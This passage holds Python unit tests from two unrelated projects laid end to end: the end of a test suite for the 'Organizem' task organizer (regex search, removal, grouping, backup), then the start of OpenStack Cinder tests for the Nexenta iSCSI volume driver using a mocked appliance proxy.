        tag1 = 'tag 1001'
        tag1_rgx = 'tag 100*'
        tags1 = [tag1]
        item1 = Item(title, {Elem.TAGS: tags1})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item1)
        self.assertTrue(orgm.find_items(Elem.TAGS, tag1_rgx,
                                        use_regex_match=True))
        # Test case of multi-value list passed to find_items() for a
        # element that is stored in item as a list (tags)
        tag2 = 'tag 1012'
        tag2_rgx = 'tag 101*'
        tags2 = [tag1, tag2]
        item2 = Item(title, {Elem.TAGS: tags2})
        orgm.add_item(item2)
        self.assertTrue(orgm.find_items(Elem.TAGS, tag2_rgx,
                                        use_regex_match=True))

    def test_add_item__find_items_by_actions(self):
        self._init_test_data_file()
        title = "title"
        action1 = 'action 100'
        action1_rgx = 'action 10*'
        actions1 = [action1]
        # TODO FIX ALL THESE Itme() ctor calls
        item1 = Item(title, {Elem.ACTIONS: actions1})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item1)
        self.assertTrue(orgm.find_items(Elem.ACTIONS, action1_rgx,
                                        use_regex_match=True))
        action2 = 'action 200'
        actions2 = [action1, action2]
        item2 = Item(title, {Elem.ACTIONS: actions2})
        orgm.add_item(item2)
        self.assertTrue(orgm.find_items(Elem.ACTIONS, action2))
        self.assertTrue(orgm.find_items(Elem.ACTIONS, actions2))

    def test_add_item__find_rgx_items_by_actions(self):
        self._init_test_data_file()
        title = "title"
        # Test case of single-value passed to find_items() for a
        # element that is stored in item as a list (tags)
        action1 = 'action 1010'
        action1_rgx = 'action 101*'
        actions1 = [action1]
        item1 = Item(title, {Elem.ACTIONS: actions1})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item1)
        self.assertTrue(orgm.find_items(Elem.ACTIONS, action1_rgx,
                                        use_regex_match=True))
        # Test case of multi-value list passed to find_items() for a
        # element that is stored in item as a list (tags)
        action2 = 'action 1020'
        action2_rgx = 'action 102*'
        actions2 = [action1, action2]
        item2 = Item(title, {Elem.ACTIONS: actions2})
        orgm.add_item(item2)
        self.assertTrue(orgm.find_items(Elem.ACTIONS, action2_rgx,
                                        use_regex_match=True))

    def test_add_item__find_items_by_priority(self):
        self._init_test_data_file()
        title = "title"
        priority = "P1"
        item = Item(title, {Elem.PRIORITY: priority})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item)
        self.assertTrue(orgm.find_items(Elem.PRIORITY, priority))

    def test_add_item__find_rgx_items_by_priority(self):
        self._init_test_data_file()
        title = "title"
        priority = "P1"
        rgx_match = "P*"
        item = Item(title, {Elem.PRIORITY: priority})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item)
        self.assertTrue(orgm.find_items(Elem.PRIORITY, rgx_match,
                                        use_regex_match=True))

    def test_add_item__find_items_by_note(self):
        self._init_test_data_file()
        title = "title"
        note = """* Support for reporting on metadata
** all titles (alpha order, due date order)
** all projects (alpha order)
** all areas (alpha order)
** all tags (alpha order)
** all actions (grouped by item, item next due date order)
http://www.snippy.com
ljalj; a dafs asdfdsa
wkwjl;qq;q;"""
        item = Item(title, {Elem.NOTE: note})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item)
        self.assertTrue(orgm.find_items(Elem.NOTE, note))

    def test_add_item__find_rgx_items_by_note(self):
        self._init_test_data_file()
        title = "title"
        note = """* Support for reporting on metadata
** all titles (alpha order, due date order)
** all projects (alpha order)
** all areas (alpha order)
** all tags (alpha order)
** all actions (grouped by item, item next due date order)
http://www.snippy.com
ljalj; a dafs asdfdsa
wkwjl;qq;q;"""
        note_rgx = r"\* Support for reporting *"
        item = Item(title, {Elem.NOTE: note})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item)
        self.assertTrue(orgm.find_items(Elem.NOTE, note_rgx,
                                        use_regex_match=True))

    def test_remove_items_rgx_by_title(self):
        self._init_test_data_file()
        title = "title"
        rgx_match = "titl*"
        item = Item(title)
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item)
        self.assertTrue(orgm.find_items(Elem.TITLE, rgx_match,
                                        use_regex_match=True))
        # NOTE: Now remove the item and check that it's not there any more
        orgm.remove_items(Elem.TITLE, rgx_match, use_regex_match=True)
        self.assertFalse(orgm.find_items(Elem.TITLE, rgx_match,
                                         use_regex_match=True))

    def test_remove_items_rgx_by_area(self):
        self._init_test_data_file()
        title = "title"
        area = "area"
        rgx_match = "are*"
        item = Item(title, {Elem.AREA: area})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item)
        self.assertTrue(orgm.find_items(Elem.AREA, rgx_match,
                                        use_regex_match=True))
        orgm.remove_items(Elem.AREA, rgx_match, use_regex_match=True)
        self.assertFalse(orgm.find_items(Elem.AREA, rgx_match,
                                         use_regex_match=True))

    def test_remove_items_by_project(self):
        self._init_test_data_file()
        title = "title"
        project = "project"
        item = Item(title, {Elem.PROJECT: project})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item)
        self.assertTrue(orgm.find_items(Elem.PROJECT, project))
        orgm.remove_items(Elem.PROJECT, project)
        self.assertFalse(orgm.find_items(Elem.PROJECT, project))

    def test_remove_items_by_tags(self):
        self._init_test_data_file()
        title = "title"
        tag1 = 'tag 1'
        tags1 = [tag1]
        item1 = Item(title, {Elem.TAGS: tags1})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item1)
        self.assertTrue(orgm.find_items(Elem.TAGS, tag1))
        orgm.remove_items(Elem.TAGS, tag1)
        self.assertFalse(orgm.find_items(Elem.TAGS, tag1))
        tag2 = 'tag 2'
        tags2 = [tag1, tag2]
        item2 = Item(title, {Elem.TAGS: tags2})
        orgm.add_item(item2)
        self.assertTrue(orgm.find_items(Elem.TAGS, tag2))
        self.assertTrue(orgm.find_items(Elem.TAGS, tags2))
        orgm.remove_items(Elem.TAGS, tags2)
        self.assertFalse(orgm.find_items(Elem.TAGS, tags2))

    def test_remove_items_rgx_by_actions(self):
        self._init_test_data_file()
        title = "title"
        action1 = 'action 110'
        rgx_match = "action 11*"
        actions1 = [action1]
        item1 = Item(title, {Elem.ACTIONS: actions1})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item1)
        self.assertTrue(orgm.find_items(Elem.ACTIONS, action1))
        orgm.remove_items(Elem.ACTIONS, rgx_match, use_regex_match=True)
        self.assertFalse(orgm.find_items(Elem.ACTIONS, action1))
        action2 = 'action 101'
        rgx_match = "action 10*"
        actions2 = [action1, action2]
        item2 = Item(title, {Elem.ACTIONS: actions2})
        orgm.add_item(item2)
        self.assertTrue(orgm.find_items(Elem.ACTIONS, action2))
        self.assertTrue(orgm.find_items(Elem.ACTIONS, actions2))
        orgm.remove_items(Elem.ACTIONS, rgx_match, use_regex_match=True)
        self.assertFalse(orgm.find_items(Elem.ACTIONS, actions2))

    def test_remove_items_by_note(self):
        self._init_test_data_file()
        title = "title"
        note = """* Support for reporting on metadata
** all titles (alpha order, due date order)
** all projects (alpha order)
** all areas (alpha order)
** all tags (alpha order)
** all actions (grouped by item, item next due date order)
http://www.snippy.com
ljalj; a dafs asdfdsa
wkwjl;qq;q;"""
        item = Item(title, {Elem.NOTE: note})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item)
        self.assertTrue(orgm.find_items(Elem.NOTE, note))
        orgm.remove_items(Elem.NOTE, note)
        self.assertFalse(orgm.find_items(Elem.NOTE, note))

    def test_remove_items_rgx_by_note(self):
        self._init_test_data_file()
        title = "title"
        note = """* Support for reporting on metadata
** all titles (alpha order, due date order)
** all projects (alpha order)
** all areas (alpha order)
** all tags (alpha order)
** all actions (grouped by item, item next due date order)
http://www.snippy.com
ljalj; a dafs asdfdsa
wkwjl;qq;q;"""
        note_rgx = r"\* Support for reporting *"
        item = Item(title, {Elem.NOTE: note})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item)
        self.assertTrue(orgm.find_items(Elem.NOTE, note_rgx,
                                        use_regex_match=True))
        orgm.remove_items(Elem.NOTE, note_rgx, use_regex_match=True)
        # Fixed: use_regex_match=True was missing here, so the old assertion
        # looked for the literal pattern string and passed vacuously.
        self.assertFalse(orgm.find_items(Elem.NOTE, note_rgx,
                                         use_regex_match=True))

    def test_get_all_titles(self):
        self._init_test_data_file()
        title1 = 'title 1'
        title2 = 'title 2'
        item1 = Item(title1)
        item2 = Item(title2)
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item1)
        orgm.add_item(item2)
        # Have to handle the fact that init of test dat file includes dummy
        # item with "TEST_ITEM" title
        self.assertEqual(orgm.get_elements(Elem.TITLE),
                         ['TEST_ITEM', 'title 1', 'title 2'])

    def test_get_all_projects(self):
        self._init_test_data_file()
        title1 = 'title 1'
        title2 = 'title 2'
        project1 = 'project 1'
        project2 = 'project 2'
        item1 = Item(title1, {Elem.PROJECT: project1})
        item2 = Item(title2, {Elem.PROJECT: project2})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item1)
        orgm.add_item(item2)
        # Have to handle the fact that init of test dat file includes dummy
        # item with empty name
        expected = ["''", 'project 1', 'project 2']
        actual = orgm.get_elements(Elem.PROJECT)
        self.assertEqual(expected, actual)

    def test_get_all_areas(self):
        self._init_test_data_file()
        title1 = 'title 1'
        title2 = 'title 2'
        area1 = 'area 1'
        area2 = 'area 2'
        item1 = Item(title1, {Elem.AREA: area1})
        item2 = Item(title2, {Elem.AREA: area2})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item1)
        orgm.add_item(item2)
        # Have to handle the fact that init of test dat file includes dummy
        # item with empty name
        expected = ["''", 'area 1', 'area 2']
        actual = orgm.get_elements(Elem.AREA)
        self.assertEqual(expected, actual)

    def test_get_all_tags(self):
        self._init_test_data_file()
        title1 = 'title 1'
        title2 = 'title 2'
        tags1 = ['tag 1', 'tag 2']
        tags2 = ['tag 3', 'tag 4']
        item1 = Item(title1, {Elem.TAGS: tags1})
        item2 = Item(title2, {Elem.TAGS: tags2})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item1)
        orgm.add_item(item2)
        expected = ['tag 1', 'tag 2', 'tag 3', 'tag 4']
        actual = orgm.get_elements(Elem.TAGS)
        self.assertEqual(expected, actual)

    def test_get_all_actions(self):
        self._init_test_data_file()
        title1 = 'title 1'
        title2 = 'title 2'
        actions1 = ['action 1', 'action 2']
        actions2 = ['action 3', 'action 4']
        item1 = Item(title1, {Elem.ACTIONS: actions1})
        item2 = Item(title2, {Elem.ACTIONS: actions2})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item1)
        orgm.add_item(item2)
        expected = ['action 1', 'action 2', 'action 3', 'action 4']
        actual = orgm.get_elements(Elem.ACTIONS)
        self.assertEqual(expected, actual)

    def test_get_grouped_items_project(self):
        self._init_test_data_file()
        title1 = 'title 1'
        title2 = 'title 2'
        title3 = 'title 3'
        title4 = 'title 4'
        project1 = 'project 1'
        project2 = 'project 2'
        item1 = Item(title1, {Elem.PROJECT: project1})
        item2 = Item(title2, {Elem.PROJECT: project2})
        item3 = Item(title3, {Elem.PROJECT: project1})
        item4 = Item(title4, {Elem.PROJECT: project2})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item1)
        orgm.add_item(item2)
        orgm.add_item(item3)
        orgm.add_item(item4)
        # Compare repr() of the grouped structures for each project key.
        expected1 = repr([{'item': [{'title': 'title 1'}, {'area': "''"},
                                    {'project': 'project 1'}, {'tags': []},
                                    {'actions': []}, {'priority': "''"},
                                    {'due_date': "''"}, {'note': ''}]},
                          {'item': [{'title': 'title 3'}, {'area': "''"},
                                    {'project': 'project 1'}, {'tags': []},
                                    {'actions': []}, {'priority': "''"},
                                    {'due_date': "''"}, {'note': ''}]}])
        expected2 = repr([{'item': [{'title': 'title 2'}, {'area': "''"},
                                    {'project': 'project 2'}, {'tags': []},
                                    {'actions': []}, {'priority': "''"},
                                    {'due_date': "''"}, {'note': ''}]},
                          {'item': [{'title': 'title 4'}, {'area': "''"},
                                    {'project': 'project 2'}, {'tags': []},
                                    {'actions': []}, {'priority': "''"},
                                    {'due_date': "''"}, {'note': ''}]}])
        actual = orgm.get_grouped_items(Elem.PROJECT)
        actual1 = repr(actual[project1])
        actual2 = repr(actual[project2])
        self.assertEqual(expected1, actual1)
        self.assertEqual(expected2, actual2)

    def test_get_grouped_items_area(self):
        self._init_test_data_file()
        title1 = 'title 1'
        title2 = 'title 2'
        title3 = 'title 3'
        title4 = 'title 4'
        area1 = 'area 1'
        area2 = 'area 2'
        item1 = Item(title1, {Elem.AREA: area1})
        item2 = Item(title2, {Elem.AREA: area2})
        item3 = Item(title3, {Elem.AREA: area1})
        item4 = Item(title4, {Elem.AREA: area2})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item1)
        orgm.add_item(item2)
        orgm.add_item(item3)
        orgm.add_item(item4)
        expected1 = repr([{'item': [{'title': 'title 1'}, {'area': 'area 1'},
                                    {'project': "''"}, {'tags': []},
                                    {'actions': []}, {'priority': "''"},
                                    {'due_date': "''"}, {'note': ''}]},
                          {'item': [{'title': 'title 3'}, {'area': 'area 1'},
                                    {'project': "''"}, {'tags': []},
                                    {'actions': []}, {'priority': "''"},
                                    {'due_date': "''"}, {'note': ''}]}])
        expected2 = repr([{'item': [{'title': 'title 2'}, {'area': 'area 2'},
                                    {'project': "''"}, {'tags': []},
                                    {'actions': []}, {'priority': "''"},
                                    {'due_date': "''"}, {'note': ''}]},
                          {'item': [{'title': 'title 4'}, {'area': 'area 2'},
                                    {'project': "''"}, {'tags': []},
                                    {'actions': []}, {'priority': "''"},
                                    {'due_date': "''"}, {'note': ''}]}])
        actual = orgm.get_grouped_items(Elem.AREA)
        actual1 = repr(actual[area1])
        actual2 = repr(actual[area2])
        self.assertEqual(expected1, actual1)
        self.assertEqual(expected2, actual2)

    def test_get_grouped_items_tags(self):
        self._init_test_data_file()
        title1 = 'title 1'
        title2 = 'title 2'
        title3 = 'title 3'
        title4 = 'title 4'
        tag1 = 'tag 1'
        tag2 = 'tag 2'
        tag3 = 'tag 3'
        tag4 = 'tag 4'
        tags1 = [tag1, tag2]
        tags2 = [tag3, tag4]
        item1 = Item(title1, {Elem.TAGS: tags1})
        item2 = Item(title2, {Elem.TAGS: tags2})
        item3 = Item(title3, {Elem.TAGS: tags1})
        item4 = Item(title4, {Elem.TAGS: tags2})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item1)
        orgm.add_item(item2)
        orgm.add_item(item3)
        orgm.add_item(item4)
        # Items 1/3 appear under both tag1 and tag2; items 2/4 under tag3/tag4.
        expected1 = repr([{'item': [{'title': 'title 1'}, {'area': "''"},
                                    {'project': "''"}, {'tags': [tag1, tag2]},
                                    {'actions': []}, {'priority': "''"},
                                    {'due_date': "''"}, {'note': ''}]},
                          {'item': [{'title': 'title 3'}, {'area': "''"},
                                    {'project': "''"}, {'tags': [tag1, tag2]},
                                    {'actions': []}, {'priority': "''"},
                                    {'due_date': "''"}, {'note': ''}]}])
        expected2 = repr([{'item': [{'title': 'title 1'}, {'area': "''"},
                                    {'project': "''"}, {'tags': [tag1, tag2]},
                                    {'actions': []}, {'priority': "''"},
                                    {'due_date': "''"}, {'note': ''}]},
                          {'item': [{'title': 'title 3'}, {'area': "''"},
                                    {'project': "''"}, {'tags': [tag1, tag2]},
                                    {'actions': []}, {'priority': "''"},
                                    {'due_date': "''"}, {'note': ''}]}])
        expected3 = repr([{'item': [{'title': 'title 2'}, {'area': "''"},
                                    {'project': "''"}, {'tags': [tag3, tag4]},
                                    {'actions': []}, {'priority': "''"},
                                    {'due_date': "''"}, {'note': ''}]},
                          {'item': [{'title': 'title 4'}, {'area': "''"},
                                    {'project': "''"}, {'tags': [tag3, tag4]},
                                    {'actions': []}, {'priority': "''"},
                                    {'due_date': "''"}, {'note': ''}]}])
        expected4 = repr([{'item': [{'title': 'title 2'}, {'area': "''"},
                                    {'project': "''"}, {'tags': [tag3, tag4]},
                                    {'actions': []}, {'priority': "''"},
                                    {'due_date': "''"}, {'note': ''}]},
                          {'item': [{'title': 'title 4'}, {'area': "''"},
                                    {'project': "''"}, {'tags': [tag3, tag4]},
                                    {'actions': []}, {'priority': "''"},
                                    {'due_date': "''"}, {'note': ''}]}])
        actual = orgm.get_grouped_items(Elem.TAGS)
        actual1 = repr(actual[tag1])
        actual2 = repr(actual[tag2])
        actual3 = repr(actual[tag3])
        actual4 = repr(actual[tag4])
        self.assertEqual(expected1, actual1)
        self.assertEqual(expected2, actual2)
        self.assertEqual(expected3, actual3)
        self.assertEqual(expected4, actual4)

    def test_regroup_data_file_project(self):
        self._init_test_data_file()
        title1 = 'title 1'
        title2 = 'title 2'
        title3 = 'title 3'
        title4 = 'title 4'
        project1 = 'project 1'
        project2 = 'project 2'
        item1 = Item(title1, {Elem.PROJECT: project1})
        item2 = Item(title2, {Elem.PROJECT: project2})
        item3 = Item(title3, {Elem.PROJECT: project1})
        item4 = Item(title4, {Elem.PROJECT: project2})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item1)
        orgm.add_item(item2)
        orgm.add_item(item3)
        orgm.add_item(item4)
        grouped_items = orgm.get_grouped_items(Elem.PROJECT)
        new_data_file_str = orgm.regroup_data_file(Elem.PROJECT,
                                                   ActionArg.ASCENDING,
                                                   with_group_labels=False)
        grouped_items_str = []
        for group_key in grouped_items.keys():
            for item in grouped_items[group_key]:
                grouped_items_str.append(str(item))
        grouped_items_str = "\n".join(grouped_items_str)
        self.assertEqual(grouped_items_str, new_data_file_str)

    def test_regroup_data_file_area(self):
        self._init_test_data_file()
        title1 = 'title 1'
        title2 = 'title 2'
        title3 = 'title 3'
        title4 = 'title 4'
        area1 = 'area 1'
        area2 = 'area 2'
        item1 = Item(title1, {Elem.AREA: area1})
        item2 = Item(title2, {Elem.AREA: area2})
        item3 = Item(title3, {Elem.AREA: area1})
        item4 = Item(title4, {Elem.AREA: area2})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item1)
        orgm.add_item(item2)
        orgm.add_item(item3)
        orgm.add_item(item4)
        grouped_items = orgm.get_grouped_items(Elem.AREA)
        new_data_file_str = orgm.regroup_data_file(Elem.AREA,
                                                   ActionArg.ASCENDING,
                                                   with_group_labels=False)
        grouped_items_str = []
        for group_key in grouped_items.keys():
            for item in grouped_items[group_key]:
                grouped_items_str.append(str(item))
        grouped_items_str = "\n".join(grouped_items_str)
        self.assertEqual(grouped_items_str, new_data_file_str)

    def test_regroup_data_file_area_sort_desc(self):
        self._init_test_data_file()
        title1 = 'title 1'
        title2 = 'title 2'
        title3 = 'title 3'
        title4 = 'title 4'
        area1 = 'area 1'
        area2 = 'area 2'
        item1 = Item(title1, {Elem.AREA: area1})
        item2 = Item(title2, {Elem.AREA: area2})
        item3 = Item(title3, {Elem.AREA: area1})
        item4 = Item(title4, {Elem.AREA: area2})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item1)
        orgm.add_item(item2)
        orgm.add_item(item3)
        orgm.add_item(item4)
        grouped_items = orgm.get_grouped_items(Elem.AREA)
        new_data_file_str = orgm.regroup_data_file(Elem.AREA,
                                                   ActionArg.DESCENDING,
                                                   with_group_labels=False)
        grouped_items_str = []
        # Fixed: dict.keys() returns a view on Python 3 (no reverse());
        # copy into a list before reversing.
        group_keys = list(grouped_items.keys())
        group_keys.reverse()
        for group_key in group_keys:
            for item in grouped_items[group_key]:
                grouped_items_str.append(str(item))
        grouped_items_str = "\n".join(grouped_items_str)
        self.assertEqual(grouped_items_str, new_data_file_str)

    def test_regroup_data_file_tags(self):
        self._init_test_data_file()
        title1 = 'title 1'
        title2 = 'title 2'
        title3 = 'title 3'
        title4 = 'title 4'
        tag1 = 'tag 1'
        tag2 = 'tag 2'
        tag3 = 'tag 3'
        tag4 = 'tag 4'
        tags1 = [tag1, tag2]
        tags2 = [tag3, tag4]
        item1 = Item(title1, {Elem.TAGS: tags1})
        item2 = Item(title2, {Elem.TAGS: tags2})
        item3 = Item(title3, {Elem.TAGS: tags1})
        item4 = Item(title4, {Elem.TAGS: tags2})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item1)
        orgm.add_item(item2)
        orgm.add_item(item3)
        orgm.add_item(item4)
        grouped_items = orgm.get_grouped_items(Elem.TAGS)
        new_data_file_str = orgm.regroup_data_file(Elem.TAGS,
                                                   ActionArg.ASCENDING,
                                                   with_group_labels=False)
        grouped_items_str = []
        for group_key in grouped_items.keys():
            for item in grouped_items[group_key]:
                grouped_items_str.append(str(item))
        grouped_items_str = "\n".join(grouped_items_str)
        self.assertEqual(grouped_items_str, new_data_file_str)

    def test_regroup_data_file_tags_sort_desc(self):
        self._init_test_data_file()
        title1 = 'title 1'
        title2 = 'title 2'
        title3 = 'title 3'
        title4 = 'title 4'
        tag1 = 'tag 1'
        tag2 = 'tag 2'
        tag3 = 'tag 3'
        tag4 = 'tag 4'
        tags1 = [tag1, tag2]
        tags2 = [tag3, tag4]
        item1 = Item(title1, {Elem.TAGS: tags1})
        item2 = Item(title2, {Elem.TAGS: tags2})
        item3 = Item(title3, {Elem.TAGS: tags1})
        item4 = Item(title4, {Elem.TAGS: tags2})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item1)
        orgm.add_item(item2)
        orgm.add_item(item3)
        orgm.add_item(item4)
        grouped_items = orgm.get_grouped_items(Elem.TAGS)
        new_data_file_str = orgm.regroup_data_file(Elem.TAGS,
                                                   ActionArg.DESCENDING,
                                                   with_group_labels=False)
        grouped_items_str = []
        # Fixed: copy the key view into a list before reversing (Python 3).
        group_keys = list(grouped_items.keys())
        group_keys.reverse()
        for group_key in group_keys:
            for item in grouped_items[group_key]:
                grouped_items_str.append(str(item))
        grouped_items_str = "\n".join(grouped_items_str)
        self.assertEqual(grouped_items_str, new_data_file_str)

    def test_backup(self):
        self._init_test_data_file()
        title1 = 'title 1'
        title2 = 'title 2'
        title3 = 'title 3'
        title4 = 'title 4'
        tag1 = 'tag 1'
        tag2 = 'tag 2'
        tag3 = 'tag 3'
        tag4 = 'tag 4'
        tags1 = [tag1, tag2]
        tags2 = [tag3, tag4]
        item1 = Item(title1, {Elem.TAGS: tags1})
        item2 = Item(title2, {Elem.TAGS: tags2})
        item3 = Item(title3, {Elem.TAGS: tags1})
        item4 = Item(title4, {Elem.TAGS: tags2})
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_item(item1)
        orgm.add_item(item2)
        orgm.add_item(item3)
        orgm.add_item(item4)
        bak_data_file = 'orgm_test.dat_bak'
        orgm.backup(bak_data_file)
        # Fixed: the comparison result was previously discarded, so the test
        # asserted nothing; assert that the backup matches the data file.
        self.assertTrue(filecmp.cmp(TEST_DATA_FILE, bak_data_file))

    # NOTE: This is a manual test. User must look at TEST_DATA_FILE
    # and confirm there is a new empty item
    def test_add_empty(self):
        self._init_test_data_file()
        orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
        orgm.add_empty()

    #def test_add_item__find_item_by_title__cli(self):
    #    self._init_test_data_file()
    #    orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
    #    title = 'my item title'
    #    cmd = ['-- add', '--title', title]
    #    orgm.run_shell_cmd(cmd)
    #    self.assertTrue(orgm.find_items(Elem.TITLE, title))


if __name__ == '__main__':
    unittest.main()
#
# Copyright 2015 Nexenta Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit tests for OpenStack Cinder volume driver
"""

import mock
# NOTE(review): `units`, `nfs` and `utils` are not referenced in the visible
# portion of this file -- presumably used further down; verify before removing.
from oslo_utils import units

from cinder import context
from cinder import db
from cinder import exception
from cinder import test
from cinder.volume import configuration as conf
from cinder.volume.drivers.nexenta import iscsi
from cinder.volume.drivers.nexenta import jsonrpc
from cinder.volume.drivers.nexenta import nfs
from cinder.volume.drivers.nexenta import utils


class TestNexentaISCSIDriver(test.TestCase):
    """Tests for the Nexenta iSCSI driver against a fully mocked NMS proxy."""

    # Canned volume/snapshot fixtures shared by all tests in this class.
    TEST_VOLUME_NAME = 'volume1'
    TEST_VOLUME_NAME2 = 'volume2'
    TEST_SNAPSHOT_NAME = 'snapshot1'
    TEST_VOLUME_REF = {
        'name': TEST_VOLUME_NAME,
        'size': 1,
        'id': '1',
        'status': 'available'
    }
    TEST_VOLUME_REF2 = {
        'name': TEST_VOLUME_NAME2,
        'size': 1,
        'id': '2',
        'status': 'in-use'
    }
    TEST_SNAPSHOT_REF = {
        'name': TEST_SNAPSHOT_NAME,
        'volume_name': TEST_VOLUME_NAME,
    }

    # NOTE(review): this override only delegates to the base class and could
    # be deleted with no behavior change.
    def __init__(self, method):
        super(TestNexentaISCSIDriver, self).__init__(method)

    def setUp(self):
        """Build a mocked Configuration and NMS proxy, then set up the driver."""
        super(TestNexentaISCSIDriver, self).setUp()
        self.cfg = mock.Mock(spec=conf.Configuration)
        self.ctxt = context.get_admin_context()
        self.cfg.nexenta_dataset_description = ''
        self.cfg.nexenta_host = '1.1.1.1'
        self.cfg.nexenta_user = 'admin'
        self.cfg.nexenta_password = 'nexenta'
        self.cfg.nexenta_volume = 'cinder'
        self.cfg.nexenta_rest_port = 2000
        self.cfg.nexenta_rest_protocol = 'http'
        self.cfg.nexenta_iscsi_target_portal_port = 3260
        self.cfg.nexenta_target_prefix = 'iqn:'
        self.cfg.nexenta_target_group_prefix = 'cinder/'
        self.cfg.nexenta_blocksize = '8K'
        self.cfg.nexenta_sparse = True
        self.cfg.nexenta_dataset_compression = 'on'
        self.cfg.nexenta_dataset_dedup = 'off'
        self.cfg.nexenta_rrmgr_compression = 1
        self.cfg.nexenta_rrmgr_tcp_buf_size = 1024
        self.cfg.nexenta_rrmgr_connections = 2
        self.cfg.reserved_percentage = 20
        self.nms_mock = mock.Mock()
        # One sub-mock per NMS subsystem the driver talks to.
        for mod in ['volume', 'zvol', 'iscsitarget', 'appliance', 'stmf',
                    'scsidisk', 'snapshot']:
            setattr(self.nms_mock, mod, mock.Mock())
        # Every NexentaJSONProxy the driver constructs resolves to nms_mock.
        self.stubs.Set(jsonrpc, 'NexentaJSONProxy',
                       lambda *_, **__: self.nms_mock)
        self.drv = iscsi.NexentaISCSIDriver(
            configuration=self.cfg)
        self.drv.db = db
        self.drv.do_setup(self.ctxt)

    def test_check_do_setup(self):
        self.assertEqual('http', self.drv.nms_protocol)

    def test_check_for_setup_error(self):
        # Missing backing volume on the appliance must raise LookupError.
        self.nms_mock.volume.object_exists.return_value = False
        self.assertRaises(LookupError, self.drv.check_for_setup_error)

    def test_local_path(self):
        self.assertRaises(NotImplementedError, self.drv.local_path, '')

    def test_create_volume(self):
        self.drv.create_volume(self.TEST_VOLUME_REF)
        self.nms_mock.zvol.create.assert_called_with(
            'cinder/%s' % self.TEST_VOLUME_REF['name'], '1G',
            self.cfg.nexenta_blocksize, self.cfg.nexenta_sparse)

    def test_delete_volume(self):
        # Origin is a regular snapshot: only the zvol is destroyed.
        self.nms_mock.zvol.get_child_props.return_value = (
            {'origin': 'cinder/volume0@snapshot'})
        self.drv.delete_volume(self.TEST_VOLUME_REF)
        self.nms_mock.zvol.get_child_props.assert_called_with(
            'cinder/volume1', 'origin')
        self.nms_mock.zvol.destroy.assert_called_with(
            'cinder/volume1', '')

        self.nms_mock.zvol.get_child_props.assert_called_with(
            'cinder/volume1', 'origin')
        self.nms_mock.zvol.destroy.assert_called_with('cinder/volume1', '')
        self.drv.delete_volume(self.TEST_VOLUME_REF)
        self.nms_mock.zvol.get_child_props.assert_called_with(
            'cinder/volume1', 'origin')

        # Origin is a cinder clone snapshot: the snapshot is destroyed too.
        self.nms_mock.zvol.get_child_props.return_value = (
            {'origin': 'cinder/volume0@cinder-clone-snapshot-1'})
        self.nms_mock.zvol.destroy.assert_called_with('cinder/volume1', '')
        self.drv.delete_volume(self.TEST_VOLUME_REF)
        self.nms_mock.snapshot.destroy.assert_called_with(
            'cinder/volume0@cinder-clone-snapshot-1', '')
        self.nms_mock.volume.object_exists.assert_called_with('cinder/volume0')

    def test_create_cloned_volume(self):
        vol = self.TEST_VOLUME_REF2
        src_vref = self.TEST_VOLUME_REF
        snapshot = {
            'volume_name': src_vref['name'],
            'name': 'cinder-clone-snapshot-%s' % vol['id'],
        }
        self.drv.create_cloned_volume(vol, src_vref)
        # Clone path: snapshot the source zvol, then clone from the snapshot.
        self.nms_mock.zvol.create_snapshot.assert_called_with(
            'cinder/%s' % src_vref['name'], snapshot['name'], '')
        self.nms_mock.zvol.clone.assert_called_with(
            'cinder/%s@%s' % (src_vref['name'], snapshot['name']),
            'cinder/%s' % vol['name'])

    def test_migrate_volume(self):
